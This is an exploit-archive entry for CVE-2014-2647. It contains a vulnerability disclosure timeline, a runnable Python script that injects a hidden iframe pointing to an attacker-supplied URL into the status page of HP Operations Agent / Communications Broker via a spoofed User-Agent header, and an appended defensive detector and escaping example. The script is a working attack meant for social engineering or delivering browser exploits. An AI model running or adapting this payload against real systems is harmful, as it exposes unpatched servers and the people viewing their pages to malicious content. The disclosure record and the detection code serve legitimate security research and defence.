HP Operations Agent Remote XSS iFrame Injection
Source: Syph0n  Author: Schmidt  Published: 2014-10-28
#!/usr/bin/env python3
# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection
# Date: 10/16/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: www.hp.com
# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14
# Tested on: Windows 7, SunOS, RHEL Linux
# CVE : CVE-2014-2647
#
# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker / HP Operations Agent.
# This vulnerability is stored in nature until the connection is terminated, as it adds the XSS string to the User-Agent.
# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status
# This exploit injects a hidden iFrame which can be used for social engineering attacks, as a browser exploit or other malicious URL can be embedded.
#
# Vulnerability Discovered by: Matt Schmidt (Syph0n)
# Timeline:
#   07/07/2014 - Submitted Discovery to ZDI
#   07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT.
#   07/12/2014 - Contacted HP SSRT
#   07/13/2014 - HP SSRT assigned Case SSRT101643
#   07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT
#   07/30/2014 - Followed up with HP
#   07/31/2014 - Response from HP indicating they need more time for Engineering to look into the submission
#   08/13/2014 - Followed up with HP
#   08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14
#   08/24/2014 - Followed up with HP on CVE Identifier and Disclosure Date
#   08/31/2014 - Followed up with HP again as no response to previous email
#   09/04/2014 - Followed up with HP again as no response to previous two emails
#   09/14/2014 - Followed up with HP again as no response to previous three emails
#   09/16/2014 - HP Responded stating they were "sorting out various items concerning this issue"
#   10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier
#   10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th.
#   10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444
#   10/15/2014 - CVE-2014-2647 Issued for this vulnerability

import argparse
import socket
import sys


# Define help menu (both positional arguments are required; the port is an option)
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
    print('\nUsage: ./exploit.py <TargetIP> <iFrameURL> [--port PORT]\n')
    print('    <TargetIP>: The Target IP Address')
    print('    <iFrameURL>: Malicious URL that will be injected as a hidden iframe\n')
    print('Options:')
    print('  [--port]: The port the HP Communications Broker is running on, default is 383')
    sys.exit(1)

# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("TargetIP")
parser.add_argument("iFrameURL")
parser.add_argument("--port", type=int, default=383)
args = parser.parse_args()

# Define User-Agent string to be spoofed (appended after the iframe, inside an <a> tag)
agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'

# Define variables
host = args.TargetIP
port = args.port
iFrameURL = args.iFrameURL


def main():
    # Hidden iframe payload built from args.iFrameURL, followed by the spoofed User-Agent in `agent`
    payload = ("GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\n"
               "User-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"
               + iFrameURL + "'></iframe><a>" + agent + "</a>\r\n\r\n")

    # Create socket and check connection to target
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("[*] Checking host: " + host + "\n")
    try:
        s.connect((host, port))
    except Exception as e:
        print("[+] Error Connecting: ", e)
        sys.exit(1)
    print("[*] Sending payload to HP OpenView HTTP Communication host " + host + "\n")

    # Keep the connection alive: the injected header remains in the status page only while this socket is open
    while payload != 'q':
        s.send(payload.encode())
        s.recv(1024)  # read (and discard) the server's response
        print("[*] Payload Sent.")
        payload = input("\n[+] Keeping Connection Open ([q]uit):")
    s.close()


if __name__ == '__main__':
    main()
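As an added example (not the PoC author's code and not HP's fix), the following Python shows the two defensive sides of the bug described in the header: a detector that parses a raw request to the status page and flags a User-Agent header carrying HTML markup, and the HTML escaping a status page must apply before reflecting that header. The request samples, host names and iframe URL are constructed placeholders.

```python
import html
import re

# Constructed samples (not captured traffic) of two requests to the status
# page named above: the first carries the hidden-iframe User-Agent the PoC
# sends, the second an ordinary browser string. Host names are placeholders.
INJECTED_REQUEST = (
    "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\n"
    "Host: agent.example\r\n"
    "User-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' "
    "src='http://placeholder.example/'></iframe><a>Mozilla/5.0 (compatible; MSIE 8.0)</a>\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\n"
    "Host: agent.example\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\n"
    "\r\n"
)

# An HTML tag (opening or closing) or a javascript: URL inside the header value;
# genuine User-Agent strings contain neither.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^<>]*>|javascript\s*:", re.IGNORECASE)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, {lower-case header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed header line: skip it rather than crash the detector
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def user_agent_is_suspicious(headers):
    """True when the User-Agent would execute as HTML if the status page reflected it unescaped."""
    return bool(MARKUP_RE.search(headers.get("user-agent", "")))

def render_status_cell(user_agent):
    """The fix a status page needs: escape the header before placing it in the HTML table."""
    return "<td>%s</td>" % html.escape(user_agent, quote=True)

if __name__ == "__main__":
    for raw in (INJECTED_REQUEST, BENIGN_REQUEST):
        request_line, headers = parse_request(raw)
        print(request_line, "-> suspicious User-Agent:", user_agent_is_suspicious(headers))
        print(render_status_cell(headers["user-agent"]))
```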




 